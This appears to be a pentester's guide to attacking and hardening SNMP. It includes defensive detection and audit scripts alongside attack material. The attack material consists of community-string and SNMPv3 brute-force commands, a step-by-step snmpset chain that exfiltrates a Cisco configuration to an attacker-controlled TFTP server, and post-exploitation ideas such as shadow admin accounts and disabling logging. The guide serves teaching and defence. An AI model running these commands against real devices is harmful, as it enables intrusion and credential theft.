A Pentester's Guide to SNMP: Exploitation, Misconfigurations, and Hardening

Introduction to the Simple Network Management Protocol (SNMP)

The Simple Network Management Protocol (SNMP) is a widely used Internet Standard protocol for managing and monitoring devices on IP networks. While essential for network administration, its often-insecure default configurations and legacy versions present a rich attack surface for penetration testers, bug bounty hunters, and red teamers. This article provides a comprehensive guide to understanding, enumerating, and exploiting SNMP, covering all protocol versions, common misconfigurations, notable vulnerabilities with public proofs-of-concept (PoCs), and an extensive deep-dive into attacking the more modern SNMPv3.

SNMP Ports and Versions

SNMP primarily operates over the User Datagram Protocol (UDP) on two standard ports:

  • Port 161/UDP: The default port where SNMP agents listen for incoming requests.
  • Port 162/UDP: The default port where SNMP managers receive asynchronous traps (notifications) from agents.

Understanding the differences between the three major SNMP versions is crucial for assessing their security posture.

| Feature        | SNMPv1                       | SNMPv2c                      | SNMPv3                          |
|----------------|------------------------------|------------------------------|---------------------------------|
| Security       | Community String (Plaintext) | Community String (Plaintext) | User-based Security Model (USM) |
| Encryption     | None                         | None                         | DES, 3DES, AES                  |
| Authentication | None                         | None                         | MD5, SHA-1, SHA-2               |
| Status         | Obsolete and insecure        | Widely used but insecure     | Current standard, recommended   |

SNMP Enumeration: Uncovering the Attack Surface

Effective enumeration is the foundation of any successful SNMP assessment. The goal is to discover active SNMP services, identify community strings or valid users, and extract as much information as possible about the target systems and network.

Community String Enumeration (SNMPv1/v2c)

For legacy versions, finding the community string is the primary objective.

Common Default Community Strings: public (read-only), private (read-write), manager, admin, community.

Brute-Forcing Tools:

  • Nmap snmp-brute script:
    nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=wordlist.txt <target>
  • onesixtyone:
    onesixtyone -c /path/to/wordlist.txt <target>
  • Metasploit snmp_login module:
    msf > use auxiliary/scanner/snmp/snmp_login

System and Network Information Enumeration

With a valid community string or user credentials, you can begin extracting a wealth of information.

  • snmpwalk: Traverses the Management Information Base (MIB) tree.
    snmpwalk -c public -v2c <target>
  • snmp-check: Provides a human-readable output.
    snmp-check -t <target> -c public
  • Nmap NSE Scripts: Use scripts like snmp-sysdescr, snmp-interfaces, snmp-processes, and snmp-netstat for detailed enumeration.

Deep Dive: Attacking SNMPv3

SNMPv3 introduced a robust security model, but it's not without its flaws and implementation weaknesses. A determined attacker has several avenues to compromise it.

Understanding the SNMPv3 Security Model

SNMPv3's User-based Security Model (USM) provides three security levels:

  • noAuthNoPriv: No authentication, no privacy. Essentially the same as SNMPv2c.
  • authNoPriv: Authentication (via MD5 or SHA) but no encryption. Protects against message modification and spoofing but not eavesdropping.
  • authPriv: Authentication and privacy (encryption via DES, 3DES, or AES). The most secure level.

SNMPv3 Username Enumeration: The Achilles' Heel

A critical design flaw in many SNMPv3 implementations allows for username enumeration. The device provides different error messages for invalid usernames versus valid usernames with incorrect passwords. This is a classic user enumeration vulnerability.

  • Request with Invalid Username: snmpwalk -v 3 -l noAuthNoPriv -u "invaliduser" <target>
    Response: snmpwalk: Unknown user name
  • Request with Valid Username: snmpwalk -v 3 -l noAuthNoPriv -u "validuser" <target>
    Response: Error in packet. Reason: authorizationError

This behavior allows an attacker to build a list of valid usernames before attempting to crack passwords.

Tools for SNMPv3 Enumeration and Brute-Force

1. snmpwn

A powerful Ruby-based tool that automates the entire process of SNMPv3 user enumeration and password cracking.

# Enumerate users and then brute-force passwords
./snmpwn.rb --hosts hosts.txt --users users.txt --passlist passwords.txt

2. snmpv3brute

This Python tool specializes in offline password cracking by analyzing captured SNMPv3 packets. This is highly effective as it avoids network detection and account lockouts.

# Capture SNMPv3 traffic first
tcpdump -i eth0 -w snmp_capture.pcap udp port 161

# Run the offline brute-force attack
python3 snmpv3brute.py -w wordlist.txt -p snmp_capture.pcap

The tool works by extracting the necessary authentication parameters (EngineID, auth parameters, and the full message) from a single captured packet and then iterating through a wordlist to find the correct password.

3. Metasploit Framework

Metasploit offers modules for both enumeration and brute-forcing.

# SNMPv3 User Enumeration
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > set VERSION 3

# SNMPv3 Login Brute-Force
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set VERSION 3
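From the defender's side, both the username enumeration described above and the online brute-force tools in this section leave the same trace: a burst of SNMP authentication failures from a single source in a short time, where a monitoring station with a mistyped credential produces one. The sliding-window detector below is an added example, not code from the original post or from any of the tools named here. The log lines are constructed and assume a Cisco-IOS-style `%SNMP-3-AUTHFAIL` syslog format; adapt the regular expression to whatever your agents emit.

```python
"""Flag bursts of SNMP authentication failures per source host.

Added example (not from the original post). Sliding-window count of SNMP auth
failures per source over syslog lines; the sample log is constructed here and
modelled on the Cisco IOS %SNMP-3-AUTHFAIL message format.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, Iterable, Optional, Tuple

# Constructed sample log (not a real capture). Six failures from one host in ~3 s
# look like enumeration/brute force; the single failure from another host does not.
SAMPLE_LOG = """\
Mar 14 10:15:01.120 core-sw1: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.20.30.40
Mar 14 10:15:01.340 core-sw1: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.20.30.40
Mar 14 10:15:01.588 core-sw1: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.20.30.40
Mar 14 10:15:02.017 core-sw1: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.20.30.40
Mar 14 10:15:02.761 core-sw1: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.20.30.40
Mar 14 10:15:03.904 core-sw1: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.20.30.40
Mar 14 10:17:44.002 core-sw1: %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 192.168.5.9
Mar 14 11:02:10.551 core-sw1: %SYS-5-CONFIG_I: Configured from console by admin on vty0
"""

AUTHFAIL_RE = re.compile(
    r"^(?P<month>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d)(?:\.\d+)? "
    r".*%SNMP-3-AUTHFAIL: .*from host (?P<src>\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_authfail(line: str) -> Optional[Tuple[datetime, str]]:
    """Return (timestamp, source_ip) for an SNMP auth-failure line, None for anything else."""
    m = AUTHFAIL_RE.match(line)
    if m is None:
        return None
    # Syslog timestamps carry no year; strptime defaults to 1900, which is fine for deltas.
    ts = datetime.strptime(f"{m['month']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
    return ts, m["src"]


def detect_authfail_bursts(lines: Iterable[str], threshold: int = 5,
                           window_seconds: int = 60) -> Dict[str, int]:
    """Return {source_ip: peak failures inside one window} for sources that hit the threshold.

    Per source, timestamps are kept in a deque trimmed to the window before counting,
    so a slow trickle of single failures never alerts while a burst does.
    """
    recent = defaultdict(deque)
    flagged: Dict[str, int] = {}
    for line in lines:
        parsed = parse_authfail(line)
        if parsed is None:
            continue
        ts, src = parsed
        window = recent[src]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            flagged[src] = max(flagged.get(src, 0), len(window))
    return flagged


if __name__ == "__main__":
    for src, count in detect_authfail_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {src}: {count} SNMP authentication failures within 60s")
```

Agents that do not syslog every failure still expose the same signal through the SNMP-USER-BASED-SM-MIB counters `usmStatsUnknownUserNames` (the "Unknown user name" case above) and `usmStatsWrongDigests` (valid user, wrong password); a poller can trend their deltas with the same threshold logic.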

SNMP Exploitation: From Information to Control

Information Disclosure (Read-Only Access)

Even with only read-only access, an attacker can map the internal network, discover running services, and identify potential targets by extracting routing tables, ARP caches, process lists, and user accounts.

Write Access Exploitation (Read-Write Access)

Gaining read-write access is the holy grail. It allows direct manipulation of the device's configuration.

  • Changing System Name: A simple test to confirm write access.
    snmpset -v2c -c private <target> .1.3.6.1.2.1.1.5.0 s "PwnedSystem"
  • Cisco Configuration Exfiltration: A classic attack to force a Cisco device to upload its configuration to an attacker-controlled TFTP server.

Scenario-Based Exploitation: Leaked Read-Write Credentials

Gaining read-write (RW) access to a device via SNMP is a critical security failure and a dream scenario for an attacker. This section provides a step-by-step guide on how to proceed once you have obtained RW credentials, covering both legacy SNMPv1/v2c and modern SNMPv3 scenarios.

Scenario 1: Leaked SNMPv1/v2c Read-Write Community String

Let's assume you have discovered a read-write community string, for example, from a leaked configuration file containing the line:

Leaked Configuration: snmp-server community secret123 RW

This line from a Cisco IOS configuration file defines a community string secret123 with read-write permissions. Here is a complete attack path from discovery to full compromise.

Step 1: Verify Read-Write Access

First, confirm that the community string actually provides write access. A simple, non-disruptive way to do this is to try changing a harmless value, like the system contact or name. If the command succeeds, you have confirmed RW access.

# Check the current system name
snmpget -v2c -c secret123 <target_ip> .1.3.6.1.2.1.1.5.0

# Attempt to change the system name
snmpset -v2c -c secret123 <target_ip> .1.3.6.1.2.1.1.5.0 s "PwnedSystem"

# Verify the change
snmpget -v2c -c secret123 <target_ip> .1.3.6.1.2.1.1.5.0
# Expected output should show "PwnedSystem"

Step 2: Full System Enumeration

With confirmed RW access, perform a deep enumeration of the device to gather all possible information. This will inform your next steps and help you understand the device's role in the network.

# Use snmp-check for a comprehensive overview
snmp-check -t <target_ip> -c secret123

# Walk the entire MIB tree and save the output for later analysis
snmpwalk -v2c -c secret123 <target_ip> > snmp_dump.txt

Analyze the output for routing tables, ARP caches, running processes, user accounts, and any other sensitive data.

Step 3: The Ultimate Goal - Configuration Exfiltration (Cisco IOS)

The most devastating attack with SNMP RW access on a Cisco device is to force it to upload its configuration file to an attacker-controlled TFTP server. This configuration file contains a goldmine of information, including plaintext passwords, VPN pre-shared keys, and network topology details.

Attack Workflow: Cisco Configuration Download via SNMP and TFTP

1. Set up your TFTP Server:

On your attacker machine (e.g., Kali Linux), install and run a TFTP server.

# Install atftpd
sudo apt-get install atftpd

# Create a TFTP directory and start the server
mkdir /tftp
chmod 777 /tftp
sudo atftpd --daemon --port 69 /tftp

2. Execute the SNMP `snmpset` Commands:

This sequence of commands instructs the Cisco device to copy its running configuration to your TFTP server. You will need the OIDs for the Cisco-specific MIBs that control this process.

# OID Reference:
# ccCopyProtocol: 1.3.6.1.4.1.9.9.96.1.1.1.1.2
# ccCopySourceFileType: 1.3.6.1.4.1.9.9.96.1.1.1.1.3
# ccCopyDestFileType: 1.3.6.1.4.1.9.9.96.1.1.1.1.4
# ccCopyServerAddress: 1.3.6.1.4.1.9.9.96.1.1.1.1.5
# ccCopyFileName: 1.3.6.1.4.1.9.9.96.1.1.1.1.6
# ccCopyEntryRowStatus: 1.3.6.1.4.1.9.9.96.1.1.1.1.14

ATTACKER_IP="<your_tftp_server_ip>"
TARGET_IP="<target_device_ip>"
COMMUNITY="secret123"

# 1. Set the protocol to TFTP (value=1)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.1 i 1

# 2. Set the source file type to running-config (value=4)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.1 i 4

# 3. Set the destination file type to network file (value=1)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.1 i 1

# 4. Set the TFTP server IP address to your attacker machine
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a $ATTACKER_IP

# 5. Set the destination filename
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.1 s "cisco-config-backup"

# 6. Start the copy by creating and activating the row in one step: RowStatus createAndGo (value=4)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.1 i 4

3. Check your TFTP Server:

If the commands were successful, the Cisco device's running configuration will appear in your /tftp directory. You can now analyze this file for sensitive information.

ls -l /tftp
cat /tftp/cisco-config-backup
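Two things in this article are directly observable on the wire: the version table showed that SNMPv1/v2c put the community string in the clear, and the workflow above is a series of SET requests into one well-known Cisco subtree. The parser below is an added example for network defenders, not code from the original post or from any vendor. It decodes the BER layer of an SNMP message (version, community, PDU type) and, for v1/v2c SETs, the varbind OIDs, so a sensor can alert on plaintext or default community strings, on writes authenticated only by a community, and on SETs into CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`). The encoder exists only to construct the sample datagrams; none of them is captured traffic.

```python
"""Inspect SNMP datagrams for plaintext-community and config-copy risks.

Added example, not code from the original post. Minimal BER parser for the SNMP
message header plus varbind OIDs of v1/v2c SET requests. All datagrams below are
constructed by build_community_message(); the v3 sample is a version-only header.
"""
from typing import List, Tuple

DEFAULT_COMMUNITIES = {"public", "private", "manager", "admin", "community"}
CONFIG_COPY_SUBTREE = "1.3.6.1.4.1.9.9.96."        # CISCO-CONFIG-COPY-MIB (ccCopy objects)
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "Response", 0xA3: "SetRequest",
             0xA4: "Trap", 0xA5: "GetBulkRequest", 0xA6: "InformRequest", 0xA7: "SNMPv2-Trap"}

def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, next_pos) for the BER element at pos; handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                               # long form: low 7 bits = number of length octets
        n = length & 0x7F
        if not 1 <= n <= 4:
            raise ValueError("unsupported BER length")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw: bytes) -> str:
    """Decode a BER OBJECT IDENTIFIER; the first octet packs the first two arcs (40*a + b)."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:                               # base-128, high bit set on continuation octets
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def varbind_oids(pdu: bytes) -> List[str]:
    """Skip request-id, error-status and error-index, then collect each varbind's OID."""
    pos = 0
    for _ in range(3):
        _, _, pos = read_tlv(pdu, pos)
    _, varbind_list, _ = read_tlv(pdu, pos)
    oids, pos = [], 0
    while pos < len(varbind_list):
        _, varbind, pos = read_tlv(varbind_list, pos)
        oids.append(decode_oid(read_tlv(varbind, 0)[1]))
    return oids

def inspect_datagram(datagram: bytes) -> List[str]:
    """Return findings for one SNMP datagram; an empty list means nothing notable."""
    tag, msg, _ = read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = read_tlv(msg, 0)
    version = int.from_bytes(ver, "big")
    if version == 3:
        return []                                   # USM header: no community string on the wire
    label = {0: "SNMPv1", 1: "SNMPv2c"}.get(version, f"version {version}")
    _, community, pos = read_tlv(msg, pos)
    community = community.decode("latin-1")
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    pdu_name = PDU_NAMES.get(pdu_tag, hex(pdu_tag))
    findings = [f"{label} {pdu_name} with plaintext community {community!r}"]
    if community in DEFAULT_COMMUNITIES:
        findings.append(f"default community string {community!r}")
    if pdu_name == "SetRequest":
        findings.append("SET request authenticated only by a community string")
        for oid in varbind_oids(pdu):
            if oid.startswith(CONFIG_COPY_SUBTREE):
                findings.append(f"SET to CISCO-CONFIG-COPY-MIB object {oid}: possible config exfiltration")
    return findings

def tlv(tag: int, value: bytes) -> bytes:
    """BER-encode one element (used only to construct sample datagrams)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def encode_oid(oid: str) -> bytes:
    """Inverse of decode_oid, for constructing sample varbinds."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc >> 7:
            arc >>= 7
            chunk.insert(0, 0x80 | (arc & 0x7F))
        out.extend(chunk)
    return bytes(out)

def build_community_message(version: int, community: str, pdu_tag: int, oids: List[str]) -> bytes:
    """Construct a v1/v2c message with NULL-valued varbinds (sample data, not captured traffic)."""
    varbinds = b"".join(tlv(0x30, tlv(0x06, encode_oid(o)) + tlv(0x05, b"")) for o in oids)
    pdu = tlv(pdu_tag, tlv(0x02, b"\x01") + tlv(0x02, b"\x00") + tlv(0x02, b"\x00") + tlv(0x30, varbinds))
    return tlv(0x30, tlv(0x02, bytes([version])) + tlv(0x04, community.encode()) + pdu)

if __name__ == "__main__":
    samples = {"v2c GET, default community": build_community_message(1, "public", 0xA0, ["1.3.6.1.2.1.1.5.0"]),
               "v2c SET, ccCopyServerAddress": build_community_message(1, "secret123", 0xA3, ["1.3.6.1.4.1.9.9.96.1.1.1.1.5.1"]),
               "v3 header (version field only)": tlv(0x30, tlv(0x02, b"\x03"))}
    for name, datagram in samples.items():
        print(f"{name}: {inspect_datagram(datagram) or ['no finding']}")
```

Feed it UDP/161 payloads from a span port or pcap and the config-copy finding fires on step 4 of the workflow above (and on every other ccCopy SET), regardless of which community string was used; on a network that has completed the migration to SNMPv3, the first finding alone (any v1/v2c message at all) is already actionable.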

Step 4: Further Exploitation Paths

  • Denial of Service: Shut down critical interfaces.
  • Configuration Modification: Add a backdoor user account, change ACLs to allow further access, or modify routing tables to redirect traffic.
  • Network Pivoting: Use the detailed information from the configuration and MIB dump to launch attacks against other devices on the network.

Scenario 2: Leaked SNMPv3 Read-Write User Credentials

Now, let's assume you have compromised a set of SNMPv3 credentials with read-write access. This is more complex due to the authentication and privacy layers.

Leaked Credentials:
  • Username: netadmin
  • Security Level: authPriv
  • Authentication Protocol: SHA
  • Authentication Password: S3cureAuthP@ss!
  • Privacy Protocol: AES
  • Privacy Password: EvenM0reS3curePrivP@ss!

The exploitation path is similar to the v1/v2c scenario, but all commands must now include the proper SNMPv3 authentication and privacy parameters.

Step 1: Verify Read-Write Access with SNMPv3

Use `snmpset` with the full set of v3 credentials to attempt a modification.

# Define variables for clarity
TARGET_IP="<target_device_ip>"
USER="netadmin"
AUTH_PROTO="SHA"
AUTH_PASS="S3cureAuthP@ss!"
PRIV_PROTO="AES"
PRIV_PASS="EvenM0reS3curePrivP@ss!"

# Attempt to change the system contact information
snmpset -v 3 -l authPriv -u $USER -a $AUTH_PROTO -A "$AUTH_PASS" -x $PRIV_PROTO -X "$PRIV_PASS" $TARGET_IP .1.3.6.1.2.1.1.4.0 s "security@attacker.com"

If the command executes without error, you have confirmed your RW credentials are valid.

Step 2: Configuration Exfiltration with SNMPv3

The same Cisco configuration download attack can be performed using SNMPv3. You simply need to add the v3 parameters to each `snmpset` command.

# Example: Setting the TFTP server IP with SNMPv3
snmpset -v 3 -l authPriv -u $USER -a $AUTH_PROTO -A "$AUTH_PASS" -x $PRIV_PROTO -X "$PRIV_PASS" $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a $ATTACKER_IP

You would repeat this for all the steps outlined in the v1/v2c scenario, adding the SNMPv3 flags to each command.

Step 3: Advanced Post-Exploitation

With SNMPv3 RW access, you can perform more subtle and persistent attacks:

  • Create a Shadow Admin: Add a new SNMPv3 user with RW privileges that the legitimate administrators may not notice.
  • Modify Logging Configuration: Change the logging server to one you control to capture syslog messages, or disable logging entirely to cover your tracks.
  • Manipulate Network Traffic: Modify routing tables or ACLs to perform man-in-the-middle attacks or exfiltrate data.

Having read-write access via SNMP, regardless of the version, is a critical vulnerability that often leads to full device and network compromise. The ability to directly read and write the device's configuration provides an attacker with unparalleled control.

Notable SNMP CVEs with Proof-of-Concepts

| CVE            | Description                          | Impact      | PoC/Exploit                                              |
|----------------|--------------------------------------|-------------|----------------------------------------------------------|
| CVE-2017-6736  | Cisco IOS SNMP Remote Code Execution | RCE         | Exploit-DB ID: 43450 (Python script)                     |
| CVE-2008-0960  | SNMPv3 HMAC Authentication Bypass    | Auth Bypass | Conceptual, involves crafted packets                     |
| CVE-2025-20352 | Cisco IOS XE SNMP RCE                | RCE         | Actively exploited in the wild (Operation Zero Disco)    |

Hardening SNMP: Best Practices

  • Always Use SNMPv3: Immediately migrate away from SNMPv1 and v2c.
  • Enforce `authPriv`: Use the highest security level, requiring both authentication and encryption.
  • Strong Credentials: Use long, complex, and unique passwords for authentication and privacy. Never reuse them.
  • Implement ACLs: Restrict SNMP access to a small, well-defined set of management stations.
  • Network Segmentation: Isolate SNMP traffic on a separate, out-of-band management network.
  • Use SNMP Views: Follow the principle of least privilege by defining views that restrict which MIBs can be accessed by specific users.
  • Disable if Unused: If SNMP is not actively used for monitoring, disable it entirely.
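Most of the items in this list can be checked mechanically against a device configuration. The audit script below is an added example, not code from the original post or from Cisco. It walks Cisco-IOS-style `snmp-server` lines and flags v1/v2c community strings (worse when RW, default, or without an ACL), SNMPv3 groups below `priv`, write views without an ACL, and MD5/DES credentials; it then shows the same checks passing on a hardened stanza that uses SNMPv3 `authPriv`, SHA/AES, a restrictive view and an ACL. Both configurations are constructed, and the command syntax is assumed from Cisco IOS; other platforms will need their own patterns.

```python
"""Audit Cisco-IOS-style SNMP configuration against the hardening checklist.

Added example, not from the original post. Both configs are constructed; the
snmp-server syntax is assumed from Cisco IOS.
"""
import re
from typing import List, Tuple

Finding = Tuple[str, str, str]          # (severity, offending line, explanation)
DEFAULT_COMMUNITIES = {"public", "private", "manager", "admin", "community"}

COMMUNITY_RE = re.compile(r"^snmp-server community (\S+)(?: view \S+)?(?: (RO|RW))?(?: (\S+))?$", re.I)
GROUP_RE = re.compile(r"^snmp-server group (\S+) v3 (noauth|auth|priv)(?P<rest>.*)$", re.I)
USER_RE = re.compile(r"^snmp-server user \S+ \S+ v3(?: auth (md5|sha) \S+)?(?: priv (des|3des|aes(?: \d+)?) \S+)?", re.I)

# Constructed weak configuration: everything the hardening list warns against.
WEAK_CONFIG = """\
snmp-server community public RO
snmp-server community secret123 RW
snmp-server group MONITOR v3 noauth read ALL write ALL
snmp-server user netops MONITOR v3 auth md5 Sample-Auth-Pass priv des Sample-Priv-Pass
"""

# Constructed hardened configuration: v3 only, authPriv, SHA/AES, least-privilege view, ACL.
HARDENED_CONFIG = """\
ip access-list standard SNMP-MGMT
 permit 10.10.10.0 0.0.0.255
snmp-server view SYS-ONLY iso.3.6.1.2.1.1 included
snmp-server group NMS-RO v3 priv read SYS-ONLY access SNMP-MGMT
snmp-server user nms NMS-RO v3 auth sha REPLACE-WITH-AUTH-PASS priv aes 128 REPLACE-WITH-PRIV-PASS
snmp-server host 10.10.10.5 version 3 priv nms
"""


def audit_snmp_config(config: str) -> List[Finding]:
    """Return one finding per weakness; an empty list means the SNMP stanza passed every check."""
    findings: List[Finding] = []
    for raw in config.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            name, mode, acl = m.group(1), (m.group(2) or "RO").upper(), m.group(3)
            findings.append(("high" if mode == "RW" else "medium", line,
                             f"SNMPv1/v2c {mode} community travels in plaintext; migrate to SNMPv3"))
            if name.lower() in DEFAULT_COMMUNITIES:
                findings.append(("high", line, f"default community string {name!r}"))
            if acl is None:
                findings.append(("medium", line, "no ACL limits which stations may use this community"))
            continue
        m = GROUP_RE.match(line)
        if m:
            group, level, rest = m.group(1), m.group(2).lower(), m.group("rest")
            if level != "priv":
                findings.append(("high", line, f"v3 group {group} accepts security level {level}; require priv"))
            if re.search(r"\bwrite\b", rest) and not re.search(r"\baccess\b", rest):
                findings.append(("medium", line, f"v3 group {group} grants write access without an ACL"))
            continue
        m = USER_RE.match(line)
        if m:
            auth, priv = m.group(1), m.group(2)
            if auth is None or priv is None:
                findings.append(("high", line, "v3 user lacks authentication and/or privacy keys"))
            if auth and auth.lower() == "md5":
                findings.append(("low", line, "MD5 authentication; prefer SHA"))
            if priv and priv.lower() == "des":
                findings.append(("medium", line, "single-DES privacy; prefer AES"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        results = audit_snmp_config(cfg)
        print(f"{label}: {len(results)} finding(s)")
        for severity, line, why in results:
            print(f"  [{severity}] {line}\n        {why}")
```

One caveat when running this against real devices: on IOS the `snmp-server user` command is not echoed in `show running-config` (use `show snmp user` instead), so a review that only parses the running-config will miss the credential-strength checks unless the user definitions are supplied separately.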

Conclusion

SNMP, particularly its legacy versions, remains a fruitful avenue for network exploitation. However, even the more secure SNMPv3 is susceptible to attack through design flaws like user enumeration and weak credential management. By understanding the full spectrum of enumeration and exploitation techniques, from community string brute-forcing to offline SNMPv3 password cracking, security professionals can effectively assess and secure this ubiquitous management protocol.

References

  1. Hackviser: SNMP Pentesting
  2. GitHub: hatlord/snmpwn
  3. GitHub: applied-risk/snmpv3brute
  4. Raesene's Ramblings: Testing SNMPv3
  5. Exploit-DB: Cisco IOS RCE (43450)
  6. CISA: Reducing the Risk of SNMP Abuse
